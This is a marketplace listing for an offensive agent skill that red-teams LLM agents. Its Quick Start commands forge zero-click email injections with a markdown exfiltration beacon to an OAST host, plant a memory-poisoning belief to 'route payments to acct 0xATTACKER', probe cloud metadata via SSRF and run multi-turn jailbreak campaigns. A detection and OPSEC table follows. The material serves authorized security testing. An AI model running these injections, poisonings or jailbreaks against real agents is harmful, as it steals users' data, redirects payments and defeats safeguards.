agentsclimarketplace

Ai agent redteam

Skill hypnguyen1209/offensive-claude/skills/ai-agent-redteam

Use when red-teaming an agentic AI / LLM application — indirect & zero-click prompt injection, MCP tool poisoning, persistent memory poisoning, excessive-agency tool abuse, multi-turn jailbreaks, PyRIT/Garak/Promptfoo harnessesFrom its SKILL.md

Install
npx -y skills add hypnguyen1209/offensive-claude --skill ai-agent-redteam

Assembled from the repository path, not quoted from the project. Check it against their README if it does not work.

3 things to look at

  • reads credentialsReads from 2 credential sources: `$AGENT_URL` and 1 more.
  • runs commandsInstructs the agent to run 7 commands, including `python scripts/agent_redteam_harness.py enumerate --endpoint $AGENT_URL --out surface.json` and 6 more.
  • fetches URLsInstructs the agent to fetch 2 URLs, including https://oast.pro/$TOKEN and 1 more.

SKILL.md

8.6 KB, ~1.9k tokens by cl100k_base, as published. Nobody here has run it

AI Agent Red Teaming

Offensive testing of autonomous LLM agents — systems that combine model reasoning with tools, memory, retrieval, and multi-step planning. This is distinct from model-level testing (see ai-security): the attack surface here is the agentic pipeline — untrusted data channels, tool/MCP integrations, persistent memory, and delegated authority. Assumes authorized engagement.

When to Activate

  • Pentesting an LLM agent with tool/function-calling, an MCP client, or a code interpreter
  • Testing RAG / email / browser assistants for indirect or zero-click prompt injection
  • Auditing MCP server integrations for tool poisoning, rug-pull, or line-jumping
  • Assessing persistent memory / long-term context for poisoning and belief drift
  • Evaluating excessive agency: confused-deputy, SSRF/RCE-via-tool, over-privileged actions
  • Running automated jailbreak campaigns (PAIR/TAP/Crescendo/Best-of-N) and measuring ASR
  • Standing up a repeatable PyRIT/Garak/Promptfoo harness mapped to OWASP Agentic Top 10 / ATLAS

Technique Map

TechniqueATT&CKCWEReferenceScript
Indirect / zero-click prompt injection (EchoLeak-class)T1566.002 / AML.T0051.001CWE-1427references/indirect-prompt-injection.mdscripts/indirect_injection_forge.py
RAG corpus poisoning & markdown/image exfiltrationT1567 / AML.T0070CWE-1426references/indirect-prompt-injection.mdscripts/indirect_injection_forge.py
Browser-agent hijack (Comet/CometJacking, Atlas)T1071.001 / AML.T0051CWE-1427references/indirect-prompt-injection.mdscripts/indirect_injection_forge.py
MCP tool poisoning / line-jumpingT1059 / AML.T0053CWE-1427references/mcp-tool-poisoning.mdscripts/mcp_tool_poison_server.py
MCP rug-pull (silent redefinition)T1554 / AML.T0010CWE-494references/mcp-tool-poisoning.mdscripts/mcp_tool_poison_server.py
Persistent memory poisoning (MINJA/MemoryGraft)T1565.001 / AML.T0070CWE-349references/memory-context-poisoning.mdscripts/memory_poison_minja.py
Excessive agency / confused-deputy tool abuseT1548 / AML.T0053CWE-862references/excessive-agency-tool-abuse.mdscripts/agency_tool_fuzzer.py
Tool output → SSRF / RCE chainingT1059 / AML.T0054CWE-918 / CWE-94references/excessive-agency-tool-abuse.mdscripts/agency_tool_fuzzer.py
Automated multi-turn jailbreak (Crescendo/TAP/PAIR)AML.T0054 / AML.T0071CWE-1426references/automated-jailbreak-multiturn.mdscripts/multiturn_jailbreak.py
Best-of-N / encoding obfuscation jailbreakAML.T0054CWE-1426references/automated-jailbreak-multiturn.mdscripts/multiturn_jailbreak.py
Harness & ASR scoring (PyRIT/Garak/Promptfoo)AML.T0071CWE-1426references/agent-redteam-tooling.mdscripts/agent_redteam_harness.py

Quick Start

# 0. Scope: enumerate agent surface — tools/functions, MCP servers, memory store, data channels
python scripts/agent_redteam_harness.py enumerate --endpoint $AGENT_URL --out surface.json

# 1. Indirect injection: forge a zero-click payload (email/doc/web) + markdown exfil beacon
python scripts/indirect_injection_forge.py --channel email \
  --exfil-base https://oast.pro/$TOKEN --obfuscate html-comment --out payload.eml

# 2. MCP: stand up a poisoned MCP server to test client validation / line-jumping
python scripts/mcp_tool_poison_server.py --mode tool-poison --transport stdio

# 3. Memory: query-only MINJA-style injection of a persistent malicious belief
python scripts/memory_poison_minja.py --endpoint $AGENT_URL \
  --trigger "vendor invoice" --payload "route payments to acct 0xATTACKER" --bridge-steps 4

# 4. Excessive agency: fuzz tool calls for confused-deputy / SSRF / path traversal
python scripts/agency_tool_fuzzer.py --endpoint $AGENT_URL --tools surface.json --ssrf-canary http://169.254.169.254/

# 5. Automated jailbreak campaign (Crescendo + Best-of-N), record ASR
python scripts/multiturn_jailbreak.py --endpoint $AGENT_URL --strategy crescendo \
  --objective "$OBJECTIVE" --max-turns 8 --judge-endpoint $JUDGE_URL

# 6. Full harness run mapped to OWASP Agentic Top 10 + MITRE ATLAS, emit finding records
python scripts/agent_redteam_harness.py run --config harness.yaml --report findings/

OPSEC & Detection (summary)

TechniqueTelemetry / IOCDetection (Sigma/EDR)OPSEC note
Indirect injectionHidden HTML comment / white-on-white / 0px text in ingested docs; markdown image to external hostScan ingested content for <!--, display:none, font-size:0, reference-style ![]; alert on agent-initiated egress to non-allowlisted domainsStage payloads only on assets in scope; use unique per-test OAST tokens to attribute hits
MCP tool poisoningNew/changed tool description hash; instruction-like text in JSON Schema description/enumDiff tool manifests on connect; flag tool metadata containing imperative verbs / <IMPORTANT> / "do not tell the user"Test against a local client; never point a real client at an untrusted server outside the lab
Memory poisoningMemory write from low-trust source; semantic drift between stored belief and source provenanceProvenance-tagged memory; alert on retrieval that injects procedural instructions; belief-drift monitorUse benign-looking triggers; document the latent trigger so blue team can replay/clean
Excessive agencyTool call to internal IP / metadata endpoint; unusual tool-chain ordering; off-hours actionsEDR/network: egress to 169.254.169.254/link-local; anomaly on tool-call sequencesUse non-destructive canaries (read-only SSRF probe) before any state-changing test
Automated jailbreakBurst of semantically-similar prompts; high-perplexity / encoded inputs; rising compliance over turnsRate + similarity clustering per session; perplexity & encoding detectors; multi-turn escalation scoringThrottle to avoid DoS; log full transcripts for the report; respect content guardrails of scope

Deep Dives

  • references/indirect-prompt-injection.md — Zero-click/indirect injection across email, RAG, docs, and AI browsers; EchoLeak chain, CometJacking, markdown/image exfil, obfuscation, detection.
  • references/mcp-tool-poisoning.md — Model Context Protocol attack surface: tool poisoning, line-jumping, rug-pull, MCP Inspector RCE; building a malicious server; client-side validation gaps.
  • references/memory-context-poisoning.md — Persistent/temporally-decoupled poisoning of agent memory, embeddings, RAG; MINJA query-only injection, MemoryGraft, AgentPoison, belief-drift detection.
  • references/excessive-agency-tool-abuse.md — OWASP LLM06 / ASI02 / ASI05: confused-deputy, over-privileged tools, SSRF/RCE via tool output, code-interpreter abuse; least-privilege controls.
  • references/automated-jailbreak-multiturn.md — PAIR, TAP, Crescendo, Best-of-N, GOAT, AutoDAN-Turbo; attacker/judge loop, encoding converters, ASR measurement, classifier-bypass tactics.
  • references/agent-redteam-tooling.md — Methodology + harness: PyRIT orchestrators, Garak probes, Promptfoo presets; OWASP Agentic Top 10 (ASI01–10) & MITRE ATLAS mapping; finding records.

What ships with it: 12 files

95.6 KB alongside SKILL.md, 6 of them executable

Keep looking

Skills are one crate of 325,949. Ordering is by how many stacks a row turns up in, so the top of any crate is what has actually been picked rather than what has the most stars.